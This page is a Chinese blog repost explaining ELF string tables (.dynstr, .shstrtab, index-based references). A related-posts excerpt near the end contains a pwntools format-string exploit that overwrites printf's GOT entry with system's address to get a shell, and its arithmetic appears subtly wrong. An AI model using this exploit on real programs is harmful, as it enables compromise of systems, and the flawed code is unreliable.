ELF Format 笔记(六)—— 字符串表

最新推荐文章于 2023-07-11 11:15:21 发布
最新推荐文章于 2023-07-11 11:15:21 发布
阅读量134 收藏
点赞数
文章标签: 移动开发
原文链接:http://www.cnblogs.com/ilocker/p/4612010.html
版权

ilocker:关注 Android 安全(新入行,0基础) QQ: 2597294287

字符串表中包含若干以 null 结尾的字符串,这些字符串通常是 symbol 或 section 的名字。当 ELF 文件的其它部分需要引用字符串时,只需提供该字符串在字符串表中的位置索引即可。

字符串表中首先是一个空串,用于表示一个空名字,所以字符串表的第一个字节是“\0”。

下图展示了一个长度为 25 字节的字符串表:

 

字符串引用示例:

 

既可以引用一个完整的字符串,也可以引用一个字符串的子串。

一个目标文件中会有多个字符串表,比如 android libstdc++.so 中有 .dynstr、.shstrtab。.shstrtab 是专门保存 section 名字的字符串表。

转载于:https://www.cnblogs.com/ilocker/p/4612010.html

weixin_30244889
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ELF中文手册——ELF中文手册
10-31
可执行连接格式(Executable and Linking Format)最初是作为应用程序二进制接口(Application Binary Interface(ABI)的一部分被UNIX系统实验室(USL)开发和发布。工具接口标准委员会(TIS)将还在发展的ELF标准选作为一种...
ELF format
navyhu的专栏
05-24 2172
Refer to http://www.skyfree.org/linux/references/ELF_Format.pdf ELF是Executable and Linking Format的缩写, 本来是UNIX系统实验室ABI(Application Binary Interface)的一部分. TIS(Tool Interface Standards) 委员会选择ELF标准作为
ELF文件格式解析
夏天Alex
07-11 3705
ELF格式分析
ELF文件格式简介
热门推荐
梦的灰色边沿...
05-03 1万+
  简单了解下ELF文件的格式。 1 简介   可执行与可链接格式 (Executable and Linkable FormatELF),常被称为 ELF格式,是一种用于可执行文件、目标代码、共享库和核心转储(core dump)的标准文件格式,一般用于类Unix系统,比如Linux,Macox等。ELF 格式灵活性高、可扩展,并且跨平台。比如它支持不同的字节序和地址范围,所以它不会不兼容某一特别的 CPU 或指令架构。这也使得 ELF 格式能够被运行于众多不同平台的各种操作系统所广泛采纳。   E.
ELF Format: 程序加载和动态链接
navyhu的专栏
05-26 3522
Refer to: http://www.skyfree.org/linux/references/ELF_Format.pdf 前一篇文讲了ELF format相关的东西,这篇翻下ELF文件的程序加载和动态链接知识 1. 介绍 可执行文件和共享目标文件实际就是静态的程序,要执行程序,系统需要创建这些文件对应的动态程序,就是进程映像(Process Image)。进程映像
ELF Format 笔记(八)—— 符号的类型和属性(st_info)
weixin_30251829的博客
07-20 166
我是天空里的一片云,偶尔投影在你的波心,你不必讶异,更无须欢喜,在转瞬间消灭了踪影。你我相逢在黑夜的海上,你有你的,我有我的,方向;你记得也好,最好你忘掉,在这交会时互放的光亮! ——徐志摩·偶然 ilocker:关注 Android 安全(新手) QQ: 2597294287 上篇笔记中说过,Elf32_Sym 结构的 st_info 成员包含了符号的类型和绑定属性等信息。 在 andr...
rust elf format 文件解析查看器源码
最新发布
04-07
rust-elf是一个提供纯Rust接口用于读取ELF目标文件的库。它具有以下特点: 适用于no_std环境:rust-elf可以在no_std环境中使用,例如内核和引导加载程序。它提供了一个不分配或使用任何std特性的ELF解析接口。no_...
ELF_Format.zip_ELF Visual_ELF_Format手册_elf
09-14
elf手册,elf格式的说明手册,英文的.elf Handbook
调试相关的elf format/gdb/dwarf
10-25
文档全部来自官方网站,英文原版。内容包含(Dwarf3,DWARF4,ELF_Format和gdb)
ELF format / ELF文件格式
03-16
2003/09/25 11:50 152,347 ELF_Format.pdf 2003/09/25 11:49 190,796 ELF_Programmer.pdf 2004/10/30 10:37 20,198 ELF动态解析符号过程(修订版).txt 2003/06/11 15:14 28,626 ELF文件格式(中文)(一) .txt 2003/09/...
ELF_Format
03-26
可执行 可链接 格式
ELF format.pdf 中文 高清带标签
04-30
非常详细的介绍了elf格式,是linux中可执行文件的格式,看看有好处的。
ELF字符串分析
astrotycoon
12-20 4664
String Table String table sections hold null-terminated character sequences, commonly called strings. The object file uses these strings to represent symbol and section names. One references a string...
ELF文件系列第四篇ELF文件静态结构中的字符串和符号
u011298001的博客
12-11 3152
默认字符串 这节描述默认字符串字符串中包含有若干个以’null’结尾的字符串。在ELF文件中,这些字符串通常是符号的名字或者节的名字。当ELF文件的其它部分需要引用某个字符串时,只需要提供该字符串字符串中的序号即可。 字符串中的第一个字符串(序号为 0)永远是”null”,它用于示一个空的名字或者没有名字。所以,字符串的第一个字节是’null’。字符串也可以是空的,不含有任...
ELF(Executable and Linking Format)文件结构描述
海棠花的博客
03-31 1584
ELF文件(Executable and Linking Format)是用在Linux系统下的一种目标文件(object file)存储格式。典型的目标文件有如下3类: 可重定向文件(relocatable file)可重定向文件里面包含了代码和数据,用于和其他可重定向文件一起链接形成一个可执行文件或者动态库。 可执行文件(executable file) 可执行文件里面...
ELF格式解读-符号
不会写代码的丝丽
04-30 3479
前言 一个优先的symtab文章 我们常常调试错误说需要符号,那么符号是什么?符号仅仅用来调试? 符号本质就是一个映射,举个例子:某行二进制汇编代码映射到源码第几行。 符号的作用: 调试 重定位 调试 window工程有一个*.pdb文件,里面编包含调试符号.可参阅wiki window pdb格式。 在java工程会使用一个叫混淆的技术,混淆后会生成混淆前后的映射文件mapping.txt,这个也可以理解为符号的一种。 在linux有一个dwarf的文件格式也是专门用于调试的文件。参阅w
字符串转换为的几种方式
f842318的专栏
06-21 1145
1.使用XQuery + OUTER APPLY,方便简洁,sql server 2005及以上使用。 SELECT T1.id FROM ( SELECT p = CONVERT(XML, '<id>' + REPLACE('1,2,3,4,5,6', ',', ...
字符串
吉祥如意的博客
01-26 696
字符串的长度往往是不固定的,所以用固定的结构来示它比较困难。 一种很常见的做法是把字符串集中起来存放到一个,然后使用字符串中的偏移来引用字符串 偏移对应的字符串如下: 这样,引用字符串时,只需要给出一个数字下标即可,不用考虑字符串长度的问题。 ...
Linux可执行文件的格式ELF
我的博客
01-19 1094
在Linux中,可执行文件的格式是ELF格式,而有一些命令可以帮助我们了解它们更多的“秘密”,以此来帮助我们解决问题。 示例程序 我们的示例程序如下: //hello.c #include<stdio.h> int main(int argc,char *argv[]) { printf("hello shouwangxiansheng\n"); return ...
字符串拼接实现pwn
12-03
字符串拼接在pwn中是非常常见的,可以用于构造payload,实现漏洞利用。下面是一个简单的例子,演示了如何使用字符串拼接实现pwn: 假设有一个程序存在格式化字符串漏洞,我们需要构造一个payload来执行system("/bin/sh")。首先,我们需要获取system函数的地址,可以使用pwntools中的DynELF模块来实现: ```python from pwn import * p = process("./vuln") # 启动程序 elf = ELF("./vuln") # 加载程序 # 获取system函数的地址 system_addr = elf.sym["system"] ``` 接下来,我们需要构造payload。由于格式化字符串漏洞是通过将格式化字符串作为参数传递给函数来触发的,因此我们需要构造一个包含system函数地址的格式化字符串。具体来说,我们可以使用"%n$"来引用参数列中的第n个参数,从而实现读取任意地址的数据。例如,"%12$n"示将当前已经输出的字符数写入参数列中的第12个参数所指向的地址中。 ```python # 构造payload payload = p32(elf.got["printf"]) # 将printf的GOT地址作为第一个参数 payload += "%{}x%12$hn".format(system_addr & 0xffff) # 将system地址的低16位写入printf的GOT地址 payload += "%{}x%13$hn".format((system_addr >> 16) & 0xffff - (system_addr & 0xffff)) # 将system地址的高16位写入printf的GOT地址+2 ``` 最后,我们只需要将payload发送给程序即可: ```python # 发送payload p.sendline(payload) p.interactive() # 进入交互模式,可以手动输入命令 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值